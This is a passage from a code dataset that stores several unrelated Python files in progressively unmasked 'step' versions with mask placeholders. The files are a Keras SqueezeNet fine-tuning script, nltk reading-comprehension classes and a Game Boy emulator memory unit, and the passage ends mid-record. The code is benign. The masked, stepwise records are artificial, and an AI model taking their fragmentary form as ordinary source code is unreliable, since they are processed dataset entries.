test_datagen.flow_from_directory(args.val_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n base_model = SqueezeNet()\n setup_to_transfer_learn(base_model)\n model = add_new_last_layer(base_model, nb_classes)\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n history_tl = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n setup_to_finetune(model)\n history_ft = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n model.save(args.output_model_file)\n if args.plot:\n plot_training(history_ft)\n\n\ndef plot_training(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(len(acc))\n plt.plot(epochs, acc, 'r.')\n plt.plot(epochs, val_acc, 'r')\n plt.title('Training and validation accuracy')\n plt.savefig('accuracy_plot.png')\n plt.close()\n plt.plot(epochs, loss, 'r.')\n plt.plot(epochs, val_loss, 'r-')\n plt.title('Training and validation loss')\n plt.savefig('loss_plot.png')\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef get_nb_files(dir):\n if not os.path.exists(dir):\n return 0\n cnt = 0\n for r, dirs, files in os.walk(dir):\n for dr in dirs:\n cnt += len(glob.glob(os.path.join(r, dr + '/*')))\n return cnt\n\n\ndef setup_to_transfer_learn(model):\n \"\"\"Freeze all layers and compile the model\"\"\"\n for layer in model.layers:\n layer.trainable = False\n\n\ndef add_new_last_layer(base_model, nb_classes):\n x = base_model.output\n x = Dropout(0.5, name='drop9')(x)\n x = Convolution2D(nb_classes, (1, 1), padding='valid', name='conv10')(x)\n x = Activation('relu', name='relu_conv10')(x)\n x = GlobalAveragePooling2D()(x)\n predictions = Activation('softmax')(x)\n return Model(inputs=base_model.input, outputs=predictions)\n\n\ndef setup_to_finetune(model):\n for layer in model.layers[:11]:\n layer.trainable = False\n for layer in model.layers[11:]:\n layer.trainable = True\n model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss=\n 'categorical_crossentropy', metrics=['accuracy'])\n\n\ndef train(args):\n nb_train_samples = get_nb_files(args.train_dir)\n nb_classes = len(glob.glob(args.train_dir + '/*'))\n nb_val_samples = get_nb_files(args.val_dir)\n nb_epoch = int(args.nb_epoch)\n batch_size = int(args.batch_size)\n steps_per_epoch = nb_train_samples / batch_size\n validation_steps = nb_val_samples / batch_size\n train_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n train_generator = train_datagen.flow_from_directory(args.train_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n val_generator = test_datagen.flow_from_directory(args.val_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n base_model = SqueezeNet()\n setup_to_transfer_learn(base_model)\n model = add_new_last_layer(base_model, nb_classes)\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n history_tl = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n setup_to_finetune(model)\n history_ft = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n model.save(args.output_model_file)\n if args.plot:\n plot_training(history_ft)\n\n\ndef plot_training(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(len(acc))\n plt.plot(epochs, acc, 'r.')\n plt.plot(epochs, val_acc, 'r')\n plt.title('Training and validation accuracy')\n plt.savefig('accuracy_plot.png')\n plt.close()\n plt.plot(epochs, loss, 'r.')\n plt.plot(epochs, val_loss, 'r-')\n plt.title('Training and validation loss')\n plt.savefig('loss_plot.png')\n\n\nif __name__ == '__main__':\n a = argparse.ArgumentParser()\n a.add_argument('--train_dir')\n a.add_argument('--val_dir')\n a.add_argument('--nb_epoch', default=NB_EPOCHS)\n a.add_argument('--batch_size', default=BAT_SIZE)\n a.add_argument('--output_model_file', default='inceptionv3-ft.model')\n a.add_argument('--plot', action='store_true')\n args = a.parse_args()\n if args.train_dir is None or args.val_dir is None:\n a.print_help()\n sys.exit(1)\n if not os.path.exists(args.train_dir) or not os.path.exists(args.val_dir):\n print('directories do not exist')\n sys.exit(1)\n train(args)\n", "step-4": "import os\nimport sys\nimport glob\nimport argparse\nimport matplotlib.pyplot as plt\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom keras.models import Model\nfrom keras.layers import GlobalAveragePooling2D, Dropout, Convolution2D, Activation\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import SGD\nfrom squeezenet import fire_module, SqueezeNet\nIM_WIDTH, IM_HEIGHT = 227, 227\nNB_EPOCHS = 3\nBAT_SIZE = 32\n\n\ndef get_nb_files(dir):\n if not os.path.exists(dir):\n return 0\n cnt = 0\n for r, dirs, files in os.walk(dir):\n for dr in dirs:\n cnt += len(glob.glob(os.path.join(r, dr + '/*')))\n return cnt\n\n\ndef setup_to_transfer_learn(model):\n \"\"\"Freeze all layers and compile the model\"\"\"\n for layer in model.layers:\n layer.trainable = False\n\n\ndef add_new_last_layer(base_model, nb_classes):\n x = base_model.output\n x = Dropout(0.5, name='drop9')(x)\n x = Convolution2D(nb_classes, (1, 1), padding='valid', name='conv10')(x)\n x = Activation('relu', name='relu_conv10')(x)\n x = GlobalAveragePooling2D()(x)\n predictions = Activation('softmax')(x)\n return Model(inputs=base_model.input, outputs=predictions)\n\n\ndef setup_to_finetune(model):\n for layer in model.layers[:11]:\n layer.trainable = False\n for layer in model.layers[11:]:\n layer.trainable = True\n model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss=\n 'categorical_crossentropy', metrics=['accuracy'])\n\n\ndef train(args):\n nb_train_samples = get_nb_files(args.train_dir)\n nb_classes = len(glob.glob(args.train_dir + '/*'))\n nb_val_samples = get_nb_files(args.val_dir)\n nb_epoch = int(args.nb_epoch)\n batch_size = int(args.batch_size)\n steps_per_epoch = nb_train_samples / batch_size\n validation_steps = nb_val_samples / batch_size\n train_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n train_generator = train_datagen.flow_from_directory(args.train_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n val_generator = test_datagen.flow_from_directory(args.val_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n base_model = SqueezeNet()\n setup_to_transfer_learn(base_model)\n model = add_new_last_layer(base_model, nb_classes)\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n history_tl = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n setup_to_finetune(model)\n history_ft = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n model.save(args.output_model_file)\n if args.plot:\n plot_training(history_ft)\n\n\ndef plot_training(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(len(acc))\n plt.plot(epochs, acc, 'r.')\n plt.plot(epochs, val_acc, 'r')\n plt.title('Training and validation accuracy')\n plt.savefig('accuracy_plot.png')\n plt.close()\n plt.plot(epochs, loss, 'r.')\n plt.plot(epochs, val_loss, 'r-')\n plt.title('Training and validation loss')\n plt.savefig('loss_plot.png')\n\n\nif __name__ == '__main__':\n a = argparse.ArgumentParser()\n a.add_argument('--train_dir')\n a.add_argument('--val_dir')\n a.add_argument('--nb_epoch', default=NB_EPOCHS)\n a.add_argument('--batch_size', default=BAT_SIZE)\n a.add_argument('--output_model_file', default='inceptionv3-ft.model')\n a.add_argument('--plot', action='store_true')\n args = a.parse_args()\n if args.train_dir is None or args.val_dir is None:\n a.print_help()\n sys.exit(1)\n if not os.path.exists(args.train_dir) or not os.path.exists(args.val_dir):\n print('directories do not exist')\n sys.exit(1)\n train(args)\n", "step-5": "#adapted from https://github.com/DeepLearningSandbox/DeepLearningSandbox/tree/master/transfer_learning\n\nimport os\nimport sys\nimport glob\nimport argparse\nimport matplotlib.pyplot as plt\n\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom keras.models import Model\nfrom keras.layers import GlobalAveragePooling2D,Dropout,Convolution2D,Activation\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import SGD\n\nfrom squeezenet import fire_module,SqueezeNet\n\nIM_WIDTH, IM_HEIGHT = 227, 227 #fixed size for squeezenet\nNB_EPOCHS = 3\nBAT_SIZE = 32\n\ndef get_nb_files(dir):\n if not os.path.exists(dir):\n return 0\n cnt = 0\n for r,dirs,files in os.walk(dir):\n for dr in dirs:\n cnt += len(glob.glob(os.path.join(r,dr+\"/*\")))\n return cnt\n\ndef setup_to_transfer_learn(model):\n \"\"\"Freeze all layers and compile the model\"\"\"\n for layer in model.layers:\n layer.trainable = False\n\n #model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\n\ndef add_new_last_layer(base_model, nb_classes):\n x = base_model.output\n x = Dropout(0.5, name='drop9')(x)\n x = Convolution2D(nb_classes, (1, 1), padding='valid', name='conv10')(x)\n x = Activation('relu', name='relu_conv10')(x)\n x = GlobalAveragePooling2D()(x)\n predictions = Activation('softmax')(x)\n return Model(inputs=base_model.input, outputs=predictions)\n\ndef setup_to_finetune(model):\n #5 layers in final output, 7 layers per fire module, finetune last 4 fire modules = 28 + 5 = 33 layers unfrozen\n #67 layers total, 0-indexed\n #layers 0-33 should be frozen, layers 34-66 trainable\n #layer 26 = finetune last 5 fire modules\n\n for layer in model.layers[:11]:\n layer.trainable=False\n for layer in model.layers[11:]:\n layer.trainable=True\n model.compile(optimizer=SGD(lr=0.0001,momentum=0.9),loss='categorical_crossentropy',metrics=['accuracy'])\n\ndef train(args):\n\n nb_train_samples = get_nb_files(args.train_dir)\n nb_classes = len(glob.glob(args.train_dir + \"/*\"))\n nb_val_samples = get_nb_files(args.val_dir)\n nb_epoch = int(args.nb_epoch)\n batch_size = int(args.batch_size)\n steps_per_epoch = nb_train_samples/batch_size\n validation_steps = nb_val_samples/batch_size\n\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input\n )\n\n test_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input\n )\n\n train_generator = train_datagen.flow_from_directory(\n args.train_dir,\n target_size = (IM_WIDTH,IM_HEIGHT),\n batch_size = batch_size,\n shuffle=True\n )\n\n val_generator = test_datagen.flow_from_directory(\n args.val_dir,\n target_size = (IM_WIDTH,IM_HEIGHT),\n batch_size = batch_size,\n shuffle=True\n )\n\n base_model = SqueezeNet()\n setup_to_transfer_learn(base_model)\n model = add_new_last_layer(base_model,nb_classes)\n\n #sgd = SGD(lr=0.001,decay=0.0002,momentum=0.9)\n #model.compile(optimizer=sgd,loss='categorical_crossentropy',metrics=['accuracy'])\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\n\n history_tl = model.fit_generator(\n generator=train_generator,\n epochs=nb_epoch,\n steps_per_epoch=steps_per_epoch,\n validation_data=val_generator,\n validation_steps = validation_steps,\n class_weight=\"auto\"\n )\n\n setup_to_finetune(model)\n\n history_ft = model.fit_generator(\n generator=train_generator,\n epochs=nb_epoch,\n steps_per_epoch=steps_per_epoch,\n validation_data=val_generator,\n validation_steps=validation_steps,\n class_weight=\"auto\"\n )\n\n model.save(args.output_model_file)\n\n if args.plot:\n plot_training(history_ft)\n\n\ndef plot_training(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(len(acc))\n\n plt.plot(epochs, acc, 'r.')\n plt.plot(epochs, val_acc, 'r')\n plt.title('Training and validation accuracy')\n plt.savefig(\"accuracy_plot.png\")\n plt.close()\n\n plt.plot(epochs, loss, 'r.')\n plt.plot(epochs, val_loss, 'r-')\n plt.title('Training and validation loss')\n plt.savefig(\"loss_plot.png\")\n\nif __name__==\"__main__\":\n a = argparse.ArgumentParser()\n a.add_argument(\"--train_dir\")\n a.add_argument(\"--val_dir\")\n a.add_argument(\"--nb_epoch\", default=NB_EPOCHS)\n a.add_argument(\"--batch_size\", default=BAT_SIZE)\n a.add_argument(\"--output_model_file\", default=\"inceptionv3-ft.model\")\n a.add_argument(\"--plot\", action=\"store_true\")\n\n args = a.parse_args()\n if args.train_dir is None or args.val_dir is None:\n a.print_help()\n sys.exit(1)\n\n if (not os.path.exists(args.train_dir)) or (not os.path.exists(args.val_dir)):\n print(\"directories do not exist\")\n sys.exit(1)\n\n train(args)", "step-ids": [ 5, 6, 7, 9, 10 ] }
[ 5, 6, 7, 9, 10 ]
import nltk class Text(object): def __init__(self, text): self.text = text self.words = nltk.word_tokenize(text) self.sents = nltk.sent_tokenize(text) class Passage(Text): def __init__(self, title, story, questions): Text.__init__(self,story) self.title = title self.questions = questions def display(self): print self.title + '\n' print self.text + '\n\n***\n' for q in self.questions: print '\n' + q.text + ' (' + q.qtype + ')' for a in q.answers: print '\t' + a.text print '\n\tCorrect Answer: ' + q.correct_answer.text class Question(Text): def __init__(self, qtext, qtype, answers, correct_answer): Text.__init__(self,qtext) self.qtype = qtype self.answers = answers self.correct_answer = correct_answer class Answer(Text): def __init__(self, atext): Text.__init__(self,atext)
normal
{ "blob_id": "5830a6001d7db50002c44aede6fb10938fa01dd1", "index": 320, "step-1": "import nltk\n\nclass Text(object):\n \n def __init__(self, text):\n self.text = text\n self.words = nltk.word_tokenize(text)\n self.sents = nltk.sent_tokenize(text)\n\nclass Passage(Text):\n\n def __init__(self, title, story, questions):\n Text.__init__(self,story)\n self.title = title\n self.questions = questions\n \n def display(self):\n print self.title + '\\n'\n print self.text + '\\n\\n***\\n'\n for q in self.questions:\n print '\\n' + q.text + ' (' + q.qtype + ')'\n for a in q.answers:\n print '\\t' + a.text\n print '\\n\\tCorrect Answer: ' + q.correct_answer.text\n \nclass Question(Text):\n \n def __init__(self, qtext, qtype, answers, correct_answer):\n Text.__init__(self,qtext)\n self.qtype = qtype\n self.answers = answers\n self.correct_answer = correct_answer\n\nclass Answer(Text):\n \n def __init__(self, atext):\n Text.__init__(self,atext)", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from mbc import MBC import random import sys from typing import Dict from interface import Interface from reg import Register, HandlerProxy # I/O Registers IE = 0xFFFF DIV = 0xFF04 TIMA= 0xFF05 TMA = 0xFF06 TAC = 0xFF07 IF = 0xFF0F LY = 0xFF44 class MMU(): #0000 3FFF 16KB ROM bank 00 From cartridge, usually a fixed bank #4000 7FFF 16KB ROM Bank 01~NN From cartridge, switchable bank via MBC (if any) #8000 9FFF 8KB Video RAM (VRAM) Only bank 0 in Non-CGB mode #Switchable bank 0/1 in CGB mode # #A000 BFFF 8KB External RAM In cartridge, switchable bank if any #C000 CFFF 4KB Work RAM (WRAM) bank 0 #D000 DFFF 4KB Work RAM (WRAM) bank 1~N Only bank 1 in Non-CGB mode #Switchable bank 1~7 in CGB mode # #E000 FDFF Mirror of C000~DDFF (ECHO RAM) Typically not used #FE00 FE9F Sprite attribute table (OAM) #FEA0 FEFF Not Usable #FF00 FF7F I/O Registers #FF80 FFFE High RAM (HRAM) #FFFF FFFF Interrupts Enable Register (IE) def __init__(self, interface:Interface, mbc:MBC) -> None: self._ui = interface self.mem = bytearray(random.getrandbits(8) for _ in range(65536)) # type: ignore # Randomise RAM view = memoryview(self.mem) self._rom0 = view[0:0x4000] self._rom1 = view[0x4000:0x8000] self._vram = view[0x8000:0xA000] self._eram = view[0xA000:0xC000] self._wram = view[0xC000:0xE000] self._wram2 = view[0xE000:0xFE00] self.OAM = view[0xFE00:0xFEA0] self.IO = view[0xFF00:0xFF80] self._HiRAM = view[0xFF80:0xFFFF] self.view = view self.mbc = mbc self.mbc.bank0 = self._rom0 self.mbc.bank1 = self._rom1 self.view[0xFE00:0xFFFF] = bytearray([0x00 for _ in range(0x1FF)]) # IO, etc defaults to blank self.mem[0xFFFF] = 0xFF # IE self.link_buffer = 0 self.serial_buff = "" self._io_handlers:Dict[int, Register] = {} self.add_io_handler(0xFF46, HandlerProxy(self.dma)) # Add bootrom disable handler self.add_io_handler(0xFF50, HandlerProxy(self.mbc.disable_bootrom)) def dma(self, val:int) -> None: dest = 0xFE00 offset = val * 0x100 for n in range(0xA0): self.mem[dest + n] = self.mem[n + offset] def __getitem__(self, val:int) -> int: if val < 0xE000: return self.view[val] elif val < 0xFE00: # Echo RAM, subtract 0x2000 return self.view[val-0x2000] elif val < 0xFE80: return self.OAM[val-0xFE00] elif val < 0xFF00: return 0xFF elif val < 0xFF80: if val in self._io_handlers: return self._io_handlers[val].value elif val == 0xFF00: return self._ui.input else: return self.IO[val-0xFF00] elif val < 0xFFFF: return self._HiRAM[val-0xFF80] elif val == 0xFFFF: return self.mem[0xFFFF] raise ValueError("Access out of bounds") def __setitem__(self, key:int, val:int) -> None: if key < 0x8000: self.mbc[key] = val elif key < 0xA000: self._vram[key-0x8000] = val elif key < 0xC000: if self.mbc.ram_enabled: # TODO: Read $0x149 and determine RAM Size # TODO: Pass to MBC self._eram[key-0xA000] = val elif key < 0xE000: self._wram[key-0xC000] = val elif key < 0xFE00: self._wram[key-0xE000] = val elif key < 0xFEA0: self.OAM[key-0xFE00] = val elif key < 0xFF00: pass elif key < 0xFF80: if key in self._io_handlers: self._io_handlers[key].value = val if key == 0xFF00: self._ui.input = val elif key == 0xFF01: self.link_buffer = val elif key == 0xFF02: if val == 0x81: self.serial_buff += chr(self.link_buffer) if self.link_buffer == ord("\n"): print(self.serial_buff, end='', file=sys.stderr) # Test ROM Routines if self.serial_buff == "Passed\n": #sys.exit(0) pass elif self.serial_buff == "Failed\n": #sys.exit(1) pass self.serial_buff = "" else: self.IO[key-0xFF00] = val elif key < 0xFFFF: self._HiRAM[key-0xFF80] = val else: self.mem[65535] = val def add_io_handler(self, val:int, handler:Register) -> None: self._io_handlers[val] = handler
normal
{ "blob_id": "1a7363736076620b7704d7264b2f0bb24514165c", "index": 9816, "step-1": "<mask token>\n\n\nclass MMU:\n <mask token>\n\n def dma(self, val: int) ->None:\n dest = 65024\n offset = val * 256\n for n in range(160):\n self.mem[dest + n] = self.mem[n + offset]\n <mask token>\n\n def __setitem__(self, key: int, val: int) ->None:\n if key < 32768:\n self.mbc[key] = val\n elif key < 40960:\n self._vram[key - 32768] = val\n elif key < 49152:\n if self.mbc.ram_enabled:\n self._eram[key - 40960] = val\n elif key < 57344:\n self._wram[key - 49152] = val\n elif key < 65024:\n self._wram[key - 57344] = val\n elif key < 65184:\n self.OAM[key - 65024] = val\n elif key < 65280:\n pass\n elif key < 65408:\n if key in self._io_handlers:\n self._io_handlers[key].value = val\n if key == 65280:\n self._ui.input = val\n elif key == 65281:\n self.link_buffer = val\n elif key == 65282:\n if val == 129:\n self.serial_buff += chr(self.link_buffer)\n if self.link_buffer == ord('\\n'):\n print(self.serial_buff, end='', file=sys.stderr)\n if self.serial_buff == 'Passed\\n':\n pass\n elif self.serial_buff == 'Failed\\n':\n pass\n self.serial_buff = ''\n else:\n self.IO[key - 65280] = val\n elif key < 65535:\n self._HiRAM[key - 65408] = val\n else:\n self.mem[65535] = val\n\n def add_io_handler(self, val: int, handler: Register) ->None:\n self._io_handlers[val] = handler\n", "step-2": "<mask token>\n\n\nclass MMU:\n\n def __init__(self, interface: Interface, mbc: MBC) ->None:\n self._ui = interface\n self.mem = bytearray(random.getrandbits(8) for _ in range(65536))\n view = memoryview(self.mem)\n self._rom0 = view[0:16384]\n self._rom1 = view[16384:32768]\n self._vram = view[32768:40960]\n self._eram = view[40960:49152]\n self._wram = view[49152:57344]\n self._wram2 = view[57344:65024]\n self.OAM = view[65024:65184]\n self.IO = view[65280:65408]\n self._HiRAM = view[65408:65535]\n self.view = view\n self.mbc = mbc\n self.mbc.bank0 = self._rom0\n self.mbc.bank1 = self._rom1\n self.view[65024:65535] = bytearray([(0) for _ in range(511)])\n self.mem[65535] = 255\n self.link_buffer = 0\n self.serial_buff = ''\n self._io_handlers: Dict[int, Register] = {}\n self.add_io_handler(65350, HandlerProxy(self.dma))\n self.add_io_handler(65360, HandlerProxy(self.mbc.disable_bootrom))\n\n def dma(self, val: int) ->None:\n dest = 65024\n offset = val * 256\n for n in range(160):\n self.mem[dest + n] = self.mem[n + offset]\n\n def __getitem__(self, val: int) ->int:\n if val < 57344:\n return self.view[val]\n elif val < 65024:\n return self.view[val - 8192]\n elif val < 65152:\n return self.OAM[val - 65024]\n elif val < 65280:\n return 255\n elif val < 65408:\n if val in self._io_handlers:\n return self._io_handlers[val].value\n elif val == 65280:\n return self._ui.input\n else:\n return self.IO[val - 65280]\n elif val < 65535:\n return self._HiRAM[val - 65408]\n elif val == 65535:\n return self.mem[65535]\n raise ValueError('Access out of bounds')\n\n def __setitem__(self, key: int, val: int) ->None:\n if key < 32768:\n self.mbc[key] = val\n elif key < 40960:\n self._vram[key - 32768] = val\n elif key < 49152:\n if self.mbc.ram_enabled:\n self._eram[key - 40960] = val\n elif key < 57344:\n self._wram[key - 49152] = val\n elif key < 65024:\n self._wram[key - 57344] = val\n elif key < 65184:\n self.OAM[key - 65024] = val\n elif key < 65280:\n pass\n elif key < 65408:\n if key in self._io_handlers:\n self._io_handlers[key].value = val\n if key == 65280:\n self._ui.input = val\n elif key == 65281:\n self.link_buffer = val\n elif key == 65282:\n if val == 129:\n self.serial_buff += chr(self.link_buffer)\n if self.link_buffer == ord('\\n'):\n print(self.serial_buff, end='', file=sys.stderr)\n if self.serial_buff == 'Passed\\n':\n pass\n elif self.serial_buff == 'Failed\\n':\n pass\n self.serial_buff = ''\n else:\n self.IO[key - 65280] = val\n elif key < 65535:\n self._HiRAM[key - 65408] = val\n else:\n self.mem[65535] = val\n\n def add_io_handler(self, val: int, handler: Register) ->None:\n self._io_handlers[val] = handler\n", "step-3": "<mask token>\nIE = 65535\nDIV = 65284\nTIMA = 65285\nTMA = 65286\nTAC = 65287\nIF = 65295\nLY = 65348\n\n\nclass MMU:\n\n def __init__(self, interface: Interface, mbc: MBC) ->None:\n self._ui = interface\n self.mem = bytearray(random.getrandbits(8) for _ in range(65536))\n view = memoryview(self.mem)\n self._rom0 = view[0:16384]\n self._rom1 = view[16384:32768]\n self._vram = view[32768:40960]\n self._eram = view[40960:49152]\n self._wram = view[49152:57344]\n self._wram2 = view[57344:65024]\n self.OAM = view[65024:65184]\n self.IO = view[65280:65408]\n self._HiRAM = view[65408:65535]\n self.view = view\n self.mbc = mbc\n self.mbc.bank0 = self._rom0\n self.mbc.bank1 = self._rom1\n self.view[65024:65535] = bytearray([(0) for _ in range(511)])\n self.mem[65535] = 255\n self.link_buffer = 0\n self.serial_buff = ''\n self._io_handlers: Dict[int, Register] = {}\n self.add_io_handler(65350, HandlerProxy(self.dma))\n self.add_io_handler(65360, HandlerProxy(self.mbc.disable_bootrom))\n\n def dma(self, val: int) ->None:\n dest = 65024\n offset = val * 256\n for n in range(160):\n self.mem[dest + n] = self.mem[n + offset]\n\n def __getitem__(self, val: int) ->int:\n if val < 57344:\n return self.view[val]\n elif val < 65024:\n return self.view[val - 8192]\n elif val < 65152:\n return self.OAM[val - 65024]\n elif val < 65280:\n return 255\n elif val < 65408:\n if val in self._io_handlers:\n return self._io_handlers[val].value\n elif val == 65280:\n return self._ui.input\n else:\n return self.IO[val - 65280]\n elif val < 65535:\n return self._HiRAM[val - 65408]\n elif val == 65535:\n return self.mem[65535]\n raise ValueError('Access out of bounds')\n\n def __setitem__(self, key: int, val: int) ->None:\n if key < 32768:\n self.mbc[key] = val\n elif key < 40960:\n self._vram[key - 32768] = val\n elif key < 49152:\n if self.mbc.ram_enabled:\n self._eram[key - 40960] = val\n elif key < 57344:\n self._wram[key - 49152] = val\n elif key < 65024:\n self._wram[key - 57344] = val\n elif key < 65184:\n self.OAM[key - 65024] = val\n elif key < 65280:\n pass\n elif key < 65408:\n if key in self._io_handlers:\n self._io_handlers[key].value = val\n if key == 65280:\n self._ui.input = val\n elif key == 65281:\n self.link_buffer = val\n elif key == 65282:\n if val == 129:\n self.serial_buff += chr(self.link_buffer)\n if self.link_buffer == ord('\\n'):\n print(self.serial_buff, end='', file=sys.stderr)\n if self.serial_buff == 'Passed\\n':\n pass\n elif self.serial_buff == 'Failed\\n':\n pass\n self.serial_buff = ''\n else:\n self.IO[key - 65280] = val\n elif key < 65535:\n self._HiRAM[key - 65408] = val\n else:\n self.mem[65535] = val\n\n def add_io_handler(self, val: int, handler: Register) ->None:\n self._io_handlers[val] = handler\n", "step-4": "from mbc import MBC\nimport random\nimport sys\nfrom typing import Dict\nfrom interface import Interface\nfrom reg import Register, HandlerProxy\nIE = 65535\nDIV = 65284\nTIMA = 65285\nTMA = 65286\nTAC = 65287\nIF = 65295\nLY = 65348\n\n\nclass MMU:\n\n def __init__(self, interface: Interface, mbc: MBC) ->None:\n self._ui = interface\n self.mem = bytearray(random.getrandbits(8) for _ in range(65536))\n view = memoryview(self.mem)\n self._rom0 = view[0:16384]\n self._rom1 = view[16384:32768]\n self._vram = view[32768:40960]\n self._eram = view[40960:49152]\n self._wram = view[49152:57344]\n self._wram2 = view[57344:65024]\n self.OAM = view[65024:65184]\n self.IO = view[65280:65408]\n self._HiRAM = view[65408:65535]\n self.view = view\n self.mbc = mbc\n self.mbc.bank0 = self._rom0\n self.mbc.bank1 = self._rom1\n self.view[65024:65535] = bytearray([(0) for _ in range(511)])\n self.mem[65535] = 255\n self.link_buffer = 0\n self.serial_buff = ''\n self._io_handlers: Dict[int, Register] = {}\n self.add_io_handler(65350, HandlerProxy(self.dma))\n self.add_io_handler(65360, HandlerProxy(self.mbc.disable_bootrom))\n\n def dma(self, val: int) ->None:\n dest = 65024\n offset = val * 256\n for n in range(160):\n self.mem[dest + n] = self.mem[n + offset]\n\n def __getitem__(self, val: int) ->int:\n if val < 57344:\n return self.view[val]\n elif val < 65024:\n return self.view[val - 8192]\n elif val < 65152:\n return self.OAM[val - 65024]\n elif val < 65280:\n return 255\n elif val < 65408:\n if val in self._io_handlers:\n return self._io_handlers[val].value\n elif val == 65280:\n return self._ui.input\n else:\n return self.IO[val - 65280]\n elif val < 65535:\n return self._HiRAM[val - 65408]\n elif val == 65535:\n return self.mem[65535]\n raise ValueError('Access out of bounds')\n\n def __setitem__(self, key: int, val: int) ->None:\n if key < 32768:\n self.mbc[key] = val\n elif key < 40960:\n self._vram[key - 32768] = val\n elif key < 49152:\n if self.mbc.ram_enabled:\n self._eram[key - 40960] = val\n elif key < 57344:\n self._wram[key - 49152] = val\n elif key < 65024:\n self._wram[key - 57344] = val\n elif key < 65184:\n self.OAM[key - 65024] = val\n elif key < 65280:\n pass\n elif key < 65408:\n if key in self._io_handlers:\n self._io_handlers[key].value = val\n if key == 65280:\n self._ui.input = val\n elif key == 65281:\n self.link_buffer = val\n elif key == 65282:\n if val == 129:\n self.serial_buff += chr(self.link_buffer)\n if self.link_buffer == ord('\\n'):\n print(self.serial_buff, end='', file=sys.stderr)\n if self.serial_buff == 'Passed\\n':\n pass\n elif self.serial_buff == 'Failed\\n':\n pass\n self.serial_buff = ''\n else:\n self.IO[key - 65280] = val\n elif key < 65535:\n self._HiRAM[key - 65408] = val\n else:\n self.mem[65535] = val\n\n def add_io_handler(self, val: int, handler: Register) ->None:\n self._io_handlers[val] = handler\n", "step-5": "from mbc import MBC\nimport random\nimport sys\nfrom typing import Dict\n\nfrom interface import Interface\nfrom reg import Register, HandlerProxy\n\n# I/O Registers\nIE = 0xFFFF\nDIV = 0xFF04 \nTIMA= 0xFF05\nTMA = 0xFF06\nTAC = 0xFF07\nIF = 0xFF0F\nLY = 0xFF44\n\n\n\nclass MMU():\n\n #0000\t3FFF\t16KB ROM bank 00\tFrom cartridge, usually a fixed bank\n #4000\t7FFF\t16KB ROM Bank 01~NN\tFrom cartridge, switchable bank via MBC (if any)\n #8000\t9FFF\t8KB Video RAM (VRAM)\tOnly bank 0 in Non-CGB mode\n #Switchable bank 0/1 in CGB mode\n #\n #A000\tBFFF\t8KB External RAM\tIn cartridge, switchable bank if any\n #C000\tCFFF\t4KB Work RAM (WRAM) bank 0\t\n #D000\tDFFF\t4KB Work RAM (WRAM) bank 1~N\tOnly bank 1 in Non-CGB mode\n #Switchable bank 1~7 in CGB mode\n #\n #E000\tFDFF\tMirror of C000~DDFF (ECHO RAM)\tTypically not used\n #FE00\tFE9F\tSprite attribute table (OAM)\t\n #FEA0\tFEFF\tNot Usable\t\n #FF00\tFF7F\tI/O Registers\t\n #FF80\tFFFE\tHigh RAM (HRAM)\t\n #FFFF\tFFFF\tInterrupts Enable Register (IE)\n\n def __init__(self, interface:Interface, mbc:MBC) -> None:\n self._ui = interface\n\n self.mem = bytearray(random.getrandbits(8) for _ in range(65536)) # type: ignore # Randomise RAM\n view = memoryview(self.mem)\n self._rom0 = view[0:0x4000]\n self._rom1 = view[0x4000:0x8000]\n self._vram = view[0x8000:0xA000]\n self._eram = view[0xA000:0xC000]\n self._wram = view[0xC000:0xE000]\n self._wram2 = view[0xE000:0xFE00]\n self.OAM = 